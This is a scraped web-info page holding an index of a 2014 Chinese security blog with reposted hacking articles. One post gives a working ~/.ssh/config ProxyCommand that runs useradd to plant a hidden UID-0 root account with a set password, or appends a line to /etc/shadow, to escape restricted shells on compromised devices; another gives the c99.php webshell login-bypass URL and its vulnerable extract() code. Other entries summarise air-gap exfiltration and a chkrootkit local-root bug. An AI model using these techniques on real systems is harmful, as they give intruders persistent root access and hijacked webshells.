5luyu.cn
注 册 商: 北京新网互联科技有限公司HTTP/1.1 200 OK 访问时间:2014年11月13日 00:22:03 类型:text/html; charset=UTF-8 Transfer-Encoding: chunked 连接:keep-alive 语言环境:PHP/5.3.17 设置Cookie:PHPSESSID=lghj9p2l8n6fnuot3q706o08c7; path=/ 过期时间:1981年11月19日 16:52:00 缓存控制:no-store, 不缓存,必须更新, post-check=0, pre-check=0 其他指令:不缓存 设置Cookie:viewarticle=1415809323; path=/ 动作:Accept-Encoding Content-Encoding: gzip 动作:Accept-Encoding 网站编码:UTF-8
陆羽's Blog想要飞的更高,就要把地平线忘掉!Feed Rss博客归档标签链接登陆AirHopper:断网状态下黑客使用FM信号监控电脑信息(含视频)No Comments| 转载文章| by 陆羽 | 224 Views.| 2014-11-02, 11:22 PM据美国科技新闻网站“瘾科技”去年底报道,德国Fraunhofer通信研究所的专家,曾经开发了一个用于概念验证的恶意攻击程序,安装在不同电脑上的多个恶意程序,可以利用扬声器和麦克风相互之间“沟通数据”,这些电脑无需存在于同一个局域网中,只需要相互距离不超过20米即可相互通信。http://bobao.360.cn/news/detail/730.html» 阅读全文阅读全文关键词: 黑客, 视频, hackchkrootkit local rootNo Comments| 转载文章| by 陆羽 | 1716 Views.| 2014-08-01, 11:18 AM发布地址CVE-2014-0476在一个执行的地方没有加 引号保护 导致可以执行 程序» 阅读全文阅读全文关键词: root, 提权突破用户命令限制,添加root权限无限制用户No Comments| 转载文章| by 陆羽 | 1197 Views.| 2014-07-31, 3:45 PM在实际渗透场景中,有很多网络设备我们拿到了root权限后ssh登陆发现有命令执行限制,这是因为ssh接口提供了一个特殊的受限制的命令外壳程序,类似busybox的感觉,他可以允许root用户对设备进行配置处理,但是不允许进行命令交互,所以相当于我们拿到的只是一个鸡肋的root用户,为了突破这种限制,我们有特别的姿势因为开放了ssh服务,所以我们可以使用scp,但是scp是无法创建目录的,所以我们想到的第一个办法是到用户目录的.ssh下,上传公钥,然后登陆到系统无需密码,事实证明可以成功登陆,但是登陆的用户的shell默认还是在这个受限的外壳下,命令交互依旧不成功那如何逃逸这种限制?比较好玩儿,ssh给我们提供了一个可以按照配置预期执行命令的功能,在$HOME/.ssh/ config中进行配置,我们可以达到这样的效果我们在配置文件中预期执行添加一个新的root用户,UID为0且无限制执行命令,以此来逃逸网络设备的限制问题config内容如下:host ztzsb #随便写一个host名称hostname ip #填写当前ipuser root #填写当前受限用户#ProxyCommand /bin/bash %h %pProxyCommand useradd -p `openssl passwd -1 -salt 'mujj' redrain` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/redrain redrain#或者echo一个到/etc/shadow#ProxyCommand echo "redrain:$1$mujj$NIovcyWTUzr76qHvsju0v.:10000:0:99999:7:::" >> /etc/shadow此时,当我们使用内置的slogin就会触发这个配置只需要scp吧这个配置文件传到我们刚才受限的用户目录的.ssh/下,登陆这个受限用户后执行slogin -N ztzsb就会执行配置中的命令~阅读全文关键词: root, 提权C99.PHP webshell 绕过登陆密码漏洞No Comments| 转载文章| by 陆羽 | 1968 Views.| 2014-06-26, 12:06 PMfrom:http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。http://127.0.0.1/c99.php?c99shcook[login]=0可直接登陆。@extract($_REQUEST["c99shcook"]);变量覆盖if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace("&nbsp;|<br>", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } }阅读全文关键词: 绕过, 密码, 漏洞, webshell, php360网络安全攻防实验室招聘启事4 Comments| 原创文章| by 陆羽 | 5715 Views.| 2014-02-27, 3:23 PM360办公区照片:http://yunpan.cn/Q4H2yIfeBezKw招聘岗位:信息安全工程师安全技术研究员安全开发工程师» 阅读全文阅读全文PHP Backdoors: Hidden With Clever Use of Extract FunctionNo Comments| 转载文章| by 陆羽 | 5593 Views.| 2014-02-19, 10:00 AMWhen a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back to the site; this type of malware is called a backdoor. This type of malware was named this because it allows for remote control of a compromised website in a way that bypasses appropriate authentication methods. You can update your site, change passwords, along with any of your admin procedures, and the backdoor
© 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询
2024-05-02 14:15, Process in 0.0065 second.